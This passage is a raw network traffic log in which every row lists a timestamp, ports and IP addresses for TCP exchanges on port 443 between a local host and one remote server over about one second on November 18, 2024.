                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.376924038 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.376960039 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377043962 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377057076 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377095938 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.377171040 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386502028 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386553049 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386670113 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386670113 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386692047 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.386934042 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387130976 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387177944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387195110 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387209892 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387334108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387334108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387487888 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387533903 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387614965 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387614965 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387624025 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.387680054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388211966 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388254881 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388277054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388283968 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.388367891 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435738087 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435772896 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435846090 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435857058 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435899973 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.435914993 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496023893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496081114 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496139050 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496149063 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496603966 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.496603966 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.504918098 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.504937887 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505033016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505049944 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505124092 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505686045 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505702972 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505769014 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505774975 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.505922079 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506156921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506171942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506259918 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506269932 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506330967 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506510019 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506525993 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506586075 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506592035 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506824017 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506903887 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.506921053 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.507011890 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.507019043 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.507189989 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.555356979 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.555382013 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.555730104 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.555740118 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.555867910 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614701986 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614726067 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614809036 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614823103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614861012 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.614897013 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623753071 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623786926 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623908997 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623914003 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623914003 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623945951 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.623972893 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.624013901 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.624866962 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.624887943 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.624972105 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.624972105 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625000954 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625264883 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625289917 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625339985 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625339985 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625353098 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625611067 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625626087 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625705957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625705957 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.625715971 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.674144030 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.674197912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.674262047 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.674282074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.674348116 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.702472925 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.702502012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.702661991 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.702672958 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742213964 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742247105 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742280006 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742392063 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742392063 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.742410898 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743659019 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743707895 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743724108 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743741989 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743748903 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743777037 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743796110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743804932 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743804932 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743813992 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743827105 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743855953 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743865013 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743874073 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743891954 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.743927956 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744079113 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744096041 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744148970 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744157076 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744256020 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744615078 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744637012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744700909 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.744709969 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793037891 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793102026 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793189049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793210030 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793229103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793268919 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793282032 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793323040 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793332100 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793358088 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793373108 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.793395996 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.841598988 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852152109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852180958 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852240086 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852282047 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852296114 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852319002 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852339983 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.852387905 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.860919952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.860966921 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861026049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861035109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861078024 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.861099958 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862457037 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862499952 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862543106 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862550020 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862577915 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862628937 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862751007 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862793922 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862817049 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862826109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862854958 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.862883091 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863454103 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863495111 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863547087 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863554955 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863588095 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863616943 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863900900 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.863941908 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.864017010 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.864025116 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.864104986 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.864104986 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.911957979 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912028074 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912058115 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912074089 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912113905 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912144899 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912265062 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912307024 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912328005 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912336111 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912364960 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.912380934 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970628023 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970649004 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970724106 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970733881 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970772028 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.970788002 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979402065 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979423046 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979475021 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979492903 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979526043 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.979537964 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.980928898 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.980943918 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981008053 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981018066 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981086016 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981374979 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981414080 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:20.981440067 CET49731443192.168.2.10198.252.105.91
